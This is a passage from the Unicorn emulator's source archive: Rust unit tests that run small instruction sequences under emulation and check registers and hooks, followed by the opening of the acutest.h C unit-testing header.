RegisterX86::EIP, RegisterX86::ES, RegisterX86::ESI, RegisterX86::ESP, RegisterX86::FPSW, RegisterX86::FS, RegisterX86::GS, RegisterX86::IP, RegisterX86::RAX, RegisterX86::RBP, RegisterX86::RBX, RegisterX86::RCX, RegisterX86::RDI, RegisterX86::RDX, RegisterX86::RIP, RegisterX86::RSI, RegisterX86::RSP, RegisterX86::SI, RegisterX86::SIL, RegisterX86::SP, RegisterX86::SPL, RegisterX86::SS, RegisterX86::CR0, RegisterX86::CR1, RegisterX86::CR2, RegisterX86::CR3, RegisterX86::CR4, RegisterX86::CR8, RegisterX86::DR0, RegisterX86::DR1, RegisterX86::DR2, RegisterX86::DR3, RegisterX86::DR4, RegisterX86::DR5, RegisterX86::DR6, RegisterX86::DR7, RegisterX86::FP0, RegisterX86::FP1, RegisterX86::FP2, RegisterX86::FP3, RegisterX86::FP4, RegisterX86::FP5, RegisterX86::FP6, RegisterX86::FP7, RegisterX86::K0, RegisterX86::K1, RegisterX86::K2, RegisterX86::K3, RegisterX86::K4, RegisterX86::K5, RegisterX86::K6, RegisterX86::K7, RegisterX86::MM0, RegisterX86::MM1, RegisterX86::MM2, RegisterX86::MM3, RegisterX86::MM4, RegisterX86::MM5, RegisterX86::MM6, RegisterX86::MM7, RegisterX86::R8, RegisterX86::R9, RegisterX86::R10, RegisterX86::R11, RegisterX86::R12, RegisterX86::R13, RegisterX86::R14, RegisterX86::R15, RegisterX86::ST0, RegisterX86::ST1, RegisterX86::ST2, RegisterX86::ST3, RegisterX86::ST4, RegisterX86::ST5, RegisterX86::ST6, RegisterX86::ST7, RegisterX86::R8B, RegisterX86::R9B, RegisterX86::R10B, RegisterX86::R11B, RegisterX86::R12B, RegisterX86::R13B, RegisterX86::R14B, RegisterX86::R15B, RegisterX86::R8D, RegisterX86::R9D, RegisterX86::R10D, RegisterX86::R11D, RegisterX86::R12D, RegisterX86::R13D, RegisterX86::R14D, RegisterX86::R15D, RegisterX86::R8W, RegisterX86::R9W, RegisterX86::R10W, RegisterX86::R11W, RegisterX86::R12W, RegisterX86::R13W, RegisterX86::R14W, RegisterX86::R15W, ]; #[test] fn emulate_x86() { let x86_code32: Vec<u8> = vec![0x41, 0x4a]; // INC ecx; DEC edx let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.reg_write(RegisterX86::EAX, 123), Ok(())); assert_eq!(emu.reg_read(RegisterX86::EAX), Ok(123)); // Attempt to write to memory before mapping it. assert_eq!( emu.mem_write(0x1000, &x86_code32), (Err(uc_error::WRITE_UNMAPPED)) ); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); assert_eq!( emu.mem_read_as_vec(0x1000, x86_code32.len()), Ok(x86_code32.clone()) ); assert_eq!(emu.reg_write(RegisterX86::ECX, 10), Ok(())); assert_eq!(emu.reg_write(RegisterX86::EDX, 50), Ok(())); assert_eq!( emu.emu_start( 0x1000, (0x1000 + x86_code32.len()) as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(emu.reg_read(RegisterX86::ECX), Ok(11)); assert_eq!(emu.reg_read(RegisterX86::EDX), Ok(49)); } #[test] fn x86_code_callback() { #[derive(PartialEq, Debug)] struct CodeExpectation(u64, u32); let expects = vec![CodeExpectation(0x1000, 1), CodeExpectation(0x1001, 1)]; let codes: Vec<CodeExpectation> = Vec::new(); let codes_cell = Rc::new(RefCell::new(codes)); let callback_codes = codes_cell.clone(); let callback = move |_: &mut Unicorn<'_, ()>, address: u64, size: u32| { let mut codes = callback_codes.borrow_mut(); codes.push(CodeExpectation(address, size)); }; let x86_code32: Vec<u8> = vec![0x41, 0x4a]; // INC ecx; DEC edx let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); let hook = emu .add_code_hook(0x1000, 0x2000, callback) .expect("failed to add code hook"); assert_eq!( emu.emu_start(0x1000, 0x1002, 10 * SECOND_SCALE, 1000), Ok(()) ); assert_eq!(expects, *codes_cell.borrow()); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_intr_callback() { #[derive(PartialEq, Debug)] struct IntrExpectation(u32); let expect = IntrExpectation(0x80); let intr_cell = Rc::new(RefCell::new(IntrExpectation(0))); let callback_intr = intr_cell.clone(); let callback = move |_: &mut Unicorn<'_, ()>, intno: u32| { *callback_intr.borrow_mut() = IntrExpectation(intno); }; let x86_code32: Vec<u8> = vec![0xcd, 0x80]; // INT 0x80; let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); let hook = emu .add_intr_hook(callback) .expect("failed to add intr hook"); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code32.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(expect, *intr_cell.borrow()); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_mem_callback() { #[derive(PartialEq, Debug)] struct MemExpectation(MemType, u64, usize, i64); let expects = vec![ MemExpectation(MemType::WRITE, 0x2000, 4, 0xdeadbeef), MemExpectation(MemType::READ_UNMAPPED, 0x10000, 4, 0), MemExpectation(MemType::READ, 0x10000, 4, 0), ]; let mems: Vec<MemExpectation> = Vec::new(); let mems_cell = Rc::new(RefCell::new(mems)); let callback_mems = mems_cell.clone(); let callback = move |uc: &mut Unicorn<'_, ()>, mem_type: MemType, address: u64, size: usize, value: i64| { let mut mems = callback_mems.borrow_mut(); mems.push(MemExpectation(mem_type, address, size, value)); if mem_type == MemType::READ_UNMAPPED { uc.mem_map(address, 0x1000, Permission::ALL).unwrap(); } true }; // mov eax, 0xdeadbeef; // mov [0x2000], eax; // mov eax, [0x10000]; let x86_code32: Vec<u8> = vec![ 0xB8, 0xEF, 0xBE, 0xAD, 0xDE, 0xA3, 0x00, 0x20, 0x00, 0x00, 0xA1, 0x00, 0x00, 0x01, 0x00, ]; let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); let hook = emu .add_mem_hook(HookType::MEM_ALL, 0, u64::MAX, callback) .expect("failed to add memory hook"); assert_eq!(emu.reg_write(RegisterX86::EAX, 0x123), Ok(())); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code32.len() as u64, 10 * SECOND_SCALE, 0x1000 ), Ok(()) ); assert_eq!(expects, *mems_cell.borrow()); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_insn_in_callback() { #[derive(PartialEq, Debug)] struct InsnInExpectation(u32, usize); let expect = InsnInExpectation(0x10, 4); let insn_cell = Rc::new(RefCell::new(InsnInExpectation(0, 0))); let callback_insn = insn_cell.clone(); let callback = move |_: &mut Unicorn<()>, port: u32, size: usize| { *callback_insn.borrow_mut() = InsnInExpectation(port, size); 42 }; let x86_code32: Vec<u8> = vec![0xe5, 0x10]; // IN eax, 0x10; let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); let hook = emu .add_insn_in_hook(callback) .expect("failed to add in hook"); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code32.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(expect, *insn_cell.borrow()); assert_eq!(emu.reg_read(RegisterX86::EAX), Ok(42)); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_insn_out_callback() { #[derive(PartialEq, Debug)] struct InsnOutExpectation(u32, usize, u32); let expect = InsnOutExpectation(0x46, 1, 0x32); let insn_cell = Rc::new(RefCell::new(InsnOutExpectation(0, 0, 0))); let callback_insn = insn_cell.clone(); let callback = move |_: &mut Unicorn<'_, ()>, port: u32, size: usize, value: u32| { *callback_insn.borrow_mut() = InsnOutExpectation(port, size, value); }; let x86_code32: Vec<u8> = vec![0xb0, 0x32, 0xe6, 0x46]; // MOV al, 0x32; OUT 0x46, al; let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); let hook = emu .add_insn_out_hook(callback) .expect("failed to add out hook"); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code32.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(expect, *insn_cell.borrow()); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_insn_sys_callback() { #[derive(PartialEq, Debug)] struct InsnSysExpectation(u64); let expect = InsnSysExpectation(0xdeadbeef); let insn_cell = Rc::new(RefCell::new(InsnSysExpectation(0))); let callback_insn = insn_cell.clone(); let callback = move |uc: &mut Unicorn<'_, ()>| { println!("!!!!"); let rax = uc.reg_read(RegisterX86::RAX).unwrap(); *callback_insn.borrow_mut() = InsnSysExpectation(rax); }; // MOV rax, 0xdeadbeef; SYSCALL; let x86_code: Vec<u8> = vec![ 0x48, 0xB8, 0xEF, 0xBE, 0xAD, 0xDE, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x05, ]; let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_64) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code), Ok(())); let hook = emu .add_insn_sys_hook(InsnSysX86::SYSCALL, 1, 0, callback) .expect("failed to add syscall hook"); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(expect, *insn_cell.borrow()); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_mmio() { #[derive(PartialEq, Debug)] struct MmioReadExpectation(u64, usize); #[derive(PartialEq, Debug)] struct MmioWriteExpectation(u64, usize, u64); let read_expect = MmioReadExpectation(4, 4); let write_expect = MmioWriteExpectation(8, 2, 42); let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_64) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x1000, Permission::ALL), Ok(())); { // MOV eax, [0x2004]; MOV [0x2008], ax; let x86_code: Vec<u8> = vec![ 0x8B, 0x04, 0x25, 0x04, 0x20, 0x00, 0x00, 0x66, 0x89, 0x04, 0x25, 0x08, 0x20, 0x00, 0x00, ]; let read_cell = Rc::new(RefCell::new(MmioReadExpectation(0, 0))); let cb_read_cell = read_cell.clone(); let read_callback = move |_: &mut Unicorn<'_, ()>, offset, size| { *cb_read_cell.borrow_mut() = MmioReadExpectation(offset, size); 42 }; let write_cell = Rc::new(RefCell::new(MmioWriteExpectation(0, 0, 0))); let cb_write_cell = write_cell.clone(); let write_callback = move |_: &mut Unicorn<'_, ()>, offset, size, value| { *cb_write_cell.borrow_mut() = MmioWriteExpectation(offset, size, value); }; assert_eq!(emu.mem_write(0x1000, &x86_code), Ok(())); assert_eq!( emu.mmio_map(0x2000, 0x1000, Some(read_callback), Some(write_callback)), Ok(()) ); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(read_expect, *read_cell.borrow()); assert_eq!(write_expect, *write_cell.borrow()); assert_eq!(emu.mem_unmap(0x2000, 0x1000), Ok(())); } { // MOV eax, [0x2004]; let x86_code: Vec<u8> = vec![0x8B, 0x04, 0x25, 0x04, 0x20, 0x00, 0x00]; let read_cell = Rc::new(RefCell::new(MmioReadExpectation(0, 0))); let cb_read_cell = read_cell.clone(); let read_callback = move |_: &mut Unicorn<'_, ()>, offset, size| { *cb_read_cell.borrow_mut() = MmioReadExpectation(offset, size); 42 }; assert_eq!(emu.mem_write(0x1000, &x86_code), Ok(())); assert_eq!(emu.mmio_map_ro(0x2000, 0x1000, read_callback), Ok(())); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(read_expect, *read_cell.borrow()); assert_eq!(emu.mem_unmap(0x2000, 0x1000), Ok(())); } { // MOV ax, 42; MOV [0x2008], ax; let x86_code: Vec<u8> = vec![ 0x66, 0xB8, 0x2A, 0x00, 0x66, 0x89, 0x04, 0x25, 0x08, 0x20, 0x00, 0x00, ]; let write_cell = Rc::new(RefCell::new(MmioWriteExpectation(0, 0, 0))); let cb_write_cell = write_cell.clone(); let write_callback = move |_: &mut Unicorn<'_, ()>, offset, size, value| { *cb_write_cell.borrow_mut() = MmioWriteExpectation(offset, size, value); }; assert_eq!(emu.mem_write(0x1000, &x86_code), Ok(())); assert_eq!(emu.mmio_map_wo(0x2000, 0x1000, write_callback), Ok(())); assert_eq!( emu.emu_start( 0x1000, 0x1000 + x86_code.len() as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(write_expect, *write_cell.borrow()); assert_eq!(emu.mem_unmap(0x2000, 0x1000), Ok(())); } } #[test] fn emulate_arm() { let arm_code32: Vec<u8> = vec![0x83, 0xb0]; // sub sp, #0xc let mut emu = unicorn_engine::Unicorn::new(Arch::ARM, Mode::THUMB) .expect("failed to initialize unicorn instance"); assert_eq!(emu.reg_write(RegisterARM::R1, 123), Ok(())); assert_eq!(emu.reg_read(RegisterARM::R1), Ok(123)); // Attempt to write to memory before mapping it. assert_eq!( emu.mem_write(0x1000, &arm_code32), (Err(uc_error::WRITE_UNMAPPED)) ); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &arm_code32), Ok(())); assert_eq!( emu.mem_read_as_vec(0x1000, arm_code32.len()), Ok(arm_code32.clone()) ); assert_eq!(emu.reg_write(RegisterARM::SP, 12), Ok(())); assert_eq!(emu.reg_write(RegisterARM::R0, 10), Ok(())); // ARM checks the least significant bit of the address to know // if the code is in Thumb mode. assert_eq!( emu.emu_start( 0x1000 | 0x01, (0x1000 | (0x01 + arm_code32.len())) as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(emu.reg_read(RegisterARM::SP), Ok(0)); assert_eq!(emu.reg_read(RegisterARM::R0), Ok(10)); } #[test] fn emulate_mips() { let mips_code32 = vec![0x56, 0x34, 0x21, 0x34]; // ori $at, $at, 0x3456; let mut emu = unicorn_engine::Unicorn::new(Arch::MIPS, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &mips_code32), Ok(())); assert_eq!( emu.mem_read_as_vec(0x1000, mips_code32.len()), Ok(mips_code32.clone()) ); assert_eq!(emu.reg_write(RegisterMIPS::AT, 0), Ok(())); assert_eq!( emu.emu_start( 0x1000, (0x1000 + mips_code32.len()) as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(emu.reg_read(RegisterMIPS::AT), Ok(0x3456)); } #[test] fn emulate_ppc() { let ppc_code32 = vec![0x7F, 0x46, 0x1A, 0x14]; // add 26, 6, 3 let mut emu = unicorn_engine::Unicorn::new(Arch::PPC, Mode::PPC32 | Mode::BIG_ENDIAN) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &ppc_code32), Ok(())); assert_eq!( emu.mem_read_as_vec(0x1000, ppc_code32.len()), Ok(ppc_code32.clone()) ); assert_eq!(emu.reg_write(RegisterPPC::R3, 42), Ok(())); assert_eq!(emu.reg_write(RegisterPPC::R6, 1337), Ok(())); assert_eq!( emu.emu_start( 0x1000, (0x1000 + ppc_code32.len()) as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(emu.reg_read(RegisterPPC::R26), Ok(1379)); } #[test] fn mem_unmapping() { let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_unmap(0x1000, 0x4000), Ok(())); } #[test] fn mem_map_ptr() { // Use an array for the emulator memory. let mut mem: [u8; 4000] = [0; 4000]; let x86_code32: Vec<u8> = vec![0x41, 0x4a]; // INC ecx; DEC edx let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); // Attempt to write to memory before mapping it. assert_eq!( emu.mem_write(0x1000, &x86_code32), (Err(uc_error::WRITE_UNMAPPED)) ); assert_eq!( unsafe { emu.mem_map_ptr(0x1000, 0x4000, Permission::ALL, mem.as_mut_ptr() as _) }, Ok(()) ); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); assert_eq!( emu.mem_read_as_vec(0x1000, x86_code32.len()), Ok(x86_code32.clone()) ); assert_eq!(emu.reg_write(RegisterX86::ECX, 10), Ok(())); assert_eq!(emu.reg_write(RegisterX86::EDX, 50), Ok(())); assert_eq!( emu.emu_start( 0x1000, (0x1000 + x86_code32.len()) as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(emu.reg_read(RegisterX86::ECX), Ok(11)); assert_eq!(emu.reg_read(RegisterX86::EDX), Ok(49)); assert_eq!(emu.mem_unmap(0x1000, 0x4000), Ok(())); // Use a Vec for the emulator memory. let mut mem: Vec<u8> = Vec::new(); mem.reserve(4000); // Attempt to write to memory before mapping it. assert_eq!( emu.mem_write(0x1000, &x86_code32), (Err(uc_error::WRITE_UNMAPPED)) ); assert_eq!( unsafe { emu.mem_map_ptr(0x1000, 0x4000, Permission::ALL, mem.as_mut_ptr() as _) }, Ok(()) ); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); assert_eq!( emu.mem_read_as_vec(0x1000, x86_code32.len()), Ok(x86_code32.clone()) ); assert_eq!(emu.reg_write(RegisterX86::ECX, 10), Ok(())); assert_eq!(emu.reg_write(RegisterX86::EDX, 50), Ok(())); assert_eq!( emu.emu_start( 0x1000, (0x1000 + x86_code32.len()) as u64, 10 * SECOND_SCALE, 1000 ), Ok(()) ); assert_eq!(emu.reg_read(RegisterX86::ECX), Ok(11)); assert_eq!(emu.reg_read(RegisterX86::EDX), Ok(49)); assert_eq!(emu.mem_unmap(0x1000, 0x4000), Ok(())); } #[test] fn x86_context_save_and_restore() { for mode in [Mode::MODE_32, Mode::MODE_64] { let x86_code = [ 0x48, 0xB8, 0xEF, 0xBE, 0xAD, 0xDE, 0x00, 0x00, 0x00, 0x00, 0x0F, 0x05, ]; let mut emu = unicorn_engine::Unicorn::new(Arch::X86, mode) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code), Ok(())); let _ = emu.emu_start( 0x1000, (0x1000 + x86_code.len()) as u64, 10 * SECOND_SCALE, 1000, ); /* now, save the context... */ let context = emu.context_init(); let context = context.unwrap(); /* and create a new emulator, into which we will "restore" that context */ let emu2 = unicorn_engine::Unicorn::new(Arch::X86, mode) .expect("failed to initialize unicorn instance"); assert_eq!(emu2.context_restore(&context), Ok(())); for register in X86_REGISTERS.iter() { println!("Testing register {:?}", register); assert_eq!(emu2.reg_read(*register), emu.reg_read(*register)); } } } #[test] fn x86_block_callback() { #[derive(PartialEq, Debug)] struct BlockExpectation(u64, u32); let expects = vec![BlockExpectation(0x1000, 2)]; let blocks: Vec<BlockExpectation> = Vec::new(); let blocks_cell = Rc::new(RefCell::new(blocks)); let callback_blocks = blocks_cell.clone(); let callback = move |_: &mut Unicorn<'_, ()>, address: u64, size: u32| { let mut blocks = callback_blocks.borrow_mut(); blocks.push(BlockExpectation(address, size)); }; let x86_code32: Vec<u8> = vec![0x41, 0x4a]; // INC ecx; DEC edx let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_32) .expect("failed to initialize unicorn instance"); assert_eq!(emu.mem_map(0x1000, 0x4000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &x86_code32), Ok(())); let hook = emu .add_block_hook(1, 0, callback) .expect("failed to add block hook"); assert_eq!( emu.emu_start(0x1000, 0x1002, 10 * SECOND_SCALE, 1000), Ok(()) ); assert_eq!(expects, *blocks_cell.borrow()); assert_eq!(emu.remove_hook(hook), Ok(())); } #[test] fn x86_tlb_callback() { #[derive(PartialEq, Debug)] struct BlockExpectation(u64, u32); let expects:u64 = 4; let count: u64 = 0; let count_cell = Rc::new(RefCell::new(count)); let callback_counter = count_cell.clone(); let tlb_callback = move |_: &mut Unicorn<'_, ()>, address: u64, _: MemType| -> Option<TlbEntry> { let mut blocks = callback_counter.borrow_mut(); *blocks += 1; return Some(TlbEntry{paddr: address, perms: Permission::ALL}); }; let syscall_callback = move |uc: &mut Unicorn<'_, ()>| { assert_eq!(uc.ctl_flush_tlb(), Ok(())); }; let code: Vec<u8> = vec![0xa3,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x00,0x0f,0x05,0xa3,0x00,0x00,0x20,0x00,0x00,0x00,0x00,0x00]; // movabs dword ptr [0x200000], eax; syscall; movabs dword ptr [0x200000], eax let mut emu = unicorn_engine::Unicorn::new(Arch::X86, Mode::MODE_64) .expect("failed to initialize unicorn instance"); assert_eq!(emu.ctl_tlb_type(TlbType::VIRTUAL), Ok(())); assert_eq!(emu.mem_map(0x1000, 0x1000, Permission::ALL), Ok(())); assert_eq!(emu.mem_map(0x200000, 0x1000, Permission::ALL), Ok(())); assert_eq!(emu.mem_write(0x1000, &code), Ok(())); let tlb_hook = emu .add_tlb_hook(0, !0u64, tlb_callback) .expect("failed to add tlb hook"); let syscall_hook = emu .add_insn_sys_hook(InsnSysX86::SYSCALL, 0, !0u64, syscall_callback) .expect("failed to add syscall hook"); assert_eq!( emu.emu_start(0x1000, (0x1000 + code.len()) as u64, 0, 0), Ok(()) ); assert_eq!(expects, *count_cell.borrow()); assert_eq!(emu.remove_hook(tlb_hook), Ok(())); assert_eq!(emu.remove_hook(syscall_hook), Ok(())); } �����������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/���������������������������������������������������������������������������0000775�0000000�0000000�00000000000�14675241067�0015325�5����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/acutest.h������������������������������������������������������������������0000664�0000000�0000000�00000172060�14675241067�0017154�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Acutest -- Another C/C++ Unit Test facility * <https://github.com/mity/acutest> * * Copyright 2013-2020 Martin Mitas * Copyright 2019 Garrett D'Amore * * Permission is hereby granted, free of charge, to any person obtaining a * copy of this software and associated documentation files (the "Software"), * to deal in the Software without restriction, including without limitation * the rights to use, copy, modify, merge, publish, distribute, sublicense, * and/or sell copies of the Software, and to permit persons to whom the * Software is furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included in * all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS * OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS * IN THE SOFTWARE. */ #ifndef ACUTEST_H #define ACUTEST_H /************************ *** Public interface *** ************************/ /* By default, "acutest.h" provides the main program entry point (function * main()). However, if the test suite is composed of multiple source files * which include "acutest.h", then this causes a problem of multiple main() * definitions. To avoid this problem, #define macro TEST_NO_MAIN in all * compilation units but one. */ /* Macro to specify list of unit tests in the suite. * The unit test implementation MUST provide list of unit tests it implements * with this macro: * * TEST_LIST = { * { "test1_name", test1_func_ptr }, * { "test2_name", test2_func_ptr }, * ... * { NULL, NULL } // zeroed record marking the end of the list * }; * * The list specifies names of each test (must be unique) and pointer to * a function implementing it. The function does not take any arguments * and has no return values, i.e. every test function has to be compatible * with this prototype: * * void test_func(void); * * Note the list has to be ended with a zeroed record. */ #define TEST_LIST const struct acutest_test_ acutest_list_[] /* Macros for testing whether an unit test succeeds or fails. These macros * can be used arbitrarily in functions implementing the unit tests. * * If any condition fails throughout execution of a test, the test fails. * * TEST_CHECK takes only one argument (the condition), TEST_CHECK_ allows * also to specify an error message to print out if the condition fails. * (It expects printf-like format string and its parameters). The macros * return non-zero (condition passes) or 0 (condition fails). * * That can be useful when more conditions should be checked only if some * preceding condition passes, as illustrated in this code snippet: * * SomeStruct* ptr = allocate_some_struct(); * if(TEST_CHECK(ptr != NULL)) { * TEST_CHECK(ptr->member1 < 100); * TEST_CHECK(ptr->member2 > 200); * } */ #define TEST_CHECK_(cond, ...) \ acutest_check_((cond), __FILE__, __LINE__, __VA_ARGS__) #define TEST_CHECK(cond) acutest_check_((cond), __FILE__, __LINE__, "%s", #cond) /* These macros are the same as TEST_CHECK_ and TEST_CHECK except that if the * condition fails, the currently executed unit test is immediately aborted. * * That is done either by calling abort() if the unit test is executed as a * child process; or via longjmp() if the unit test is executed within the * main Acutest process. * * As a side effect of such abortion, your unit tests may cause memory leaks, * unflushed file descriptors, and other phenomena caused by the abortion. * * Therefore you should not use these as a general replacement for TEST_CHECK. * Use it with some caution, especially if your test causes some other side * effects to the outside world (e.g. communicating with some server, inserting * into a database etc.). */ #define TEST_ASSERT_(cond, ...) \ do { \ if (!acutest_check_((cond), __FILE__, __LINE__, __VA_ARGS__)) \ acutest_abort_(); \ } while (0) #define TEST_ASSERT(cond) \ do { \ if (!acutest_check_((cond), __FILE__, __LINE__, "%s", #cond)) \ acutest_abort_(); \ } while (0) #ifdef __cplusplus /* Macros to verify that the code (the 1st argument) throws exception of given * type (the 2nd argument). (Note these macros are only available in C++.) * * TEST_EXCEPTION_ is like TEST_EXCEPTION but accepts custom printf-like * message. * * For example: * * TEST_EXCEPTION(function_that_throw(), ExpectedExceptionType); * * If the function_that_throw() throws ExpectedExceptionType, the check passes. * If the function throws anything incompatible with ExpectedExceptionType * (or if it does not thrown an exception at all), the check fails. */ #define TEST_EXCEPTION(code, exctype) \ do { \ bool exc_ok_ = false; \ const char *msg_ = NULL; \ try { \ code; \ msg_ = "No exception thrown."; \ } catch (exctype const &) { \ exc_ok_ = true; \ } catch (...) { \ msg_ = "Unexpected exception thrown."; \ } \ acutest_check_(exc_ok_, __FILE__, __LINE__, \ #code " throws " #exctype); \ if (msg_ != NULL) \ acutest_message_("%s", msg_); \ } while (0) #define TEST_EXCEPTION_(code, exctype, ...) \ do { \ bool exc_ok_ = false; \ const char *msg_ = NULL; \ try { \ code; \ msg_ = "No exception thrown."; \ } catch (exctype const &) { \ exc_ok_ = true; \ } catch (...) { \ msg_ = "Unexpected exception thrown."; \ } \ acutest_check_(exc_ok_, __FILE__, __LINE__, __VA_ARGS__); \ if (msg_ != NULL) \ acutest_message_("%s", msg_); \ } while (0) #endif /* #ifdef __cplusplus */ /* Sometimes it is useful to split execution of more complex unit tests to some * smaller parts and associate those parts with some names. * * This is especially handy if the given unit test is implemented as a loop * over some vector of multiple testing inputs. Using these macros allow to use * sort of subtitle for each iteration of the loop (e.g. outputting the input * itself or a name associated to it), so that if any TEST_CHECK condition * fails in the loop, it can be easily seen which iteration triggers the * failure, without the need to manually output the iteration-specific data in * every single TEST_CHECK inside the loop body. * * TEST_CASE allows to specify only single string as the name of the case, * TEST_CASE_ provides all the power of printf-like string formatting. * * Note that the test cases cannot be nested. Starting a new test case ends * implicitly the previous one. To end the test case explicitly (e.g. to end * the last test case after exiting the loop), you may use TEST_CASE(NULL). */ #define TEST_CASE_(...) acutest_case_(__VA_ARGS__) #define TEST_CASE(name) acutest_case_("%s", name) /* Maximal output per TEST_CASE call. Longer messages are cut. * You may define another limit prior including "acutest.h" */ #ifndef TEST_CASE_MAXSIZE #define TEST_CASE_MAXSIZE 64 #endif /* printf-like macro for outputting an extra information about a failure. * * Intended use is to output some computed output versus the expected value, * e.g. like this: * * if(!TEST_CHECK(produced == expected)) { * TEST_MSG("Expected: %d", expected); * TEST_MSG("Produced: %d", produced); * } * * Note the message is only written down if the most recent use of any checking * macro (like e.g. TEST_CHECK or TEST_EXCEPTION) in the current test failed. * This means the above is equivalent to just this: * * TEST_CHECK(produced == expected); * TEST_MSG("Expected: %d", expected); * TEST_MSG("Produced: %d", produced); * * The macro can deal with multi-line output fairly well. It also automatically * adds a final new-line if there is none present. */ #define TEST_MSG(...) acutest_message_(__VA_ARGS__) /* Maximal output per TEST_MSG call. Longer messages are cut. * You may define another limit prior including "acutest.h" */ #ifndef TEST_MSG_MAXSIZE #define 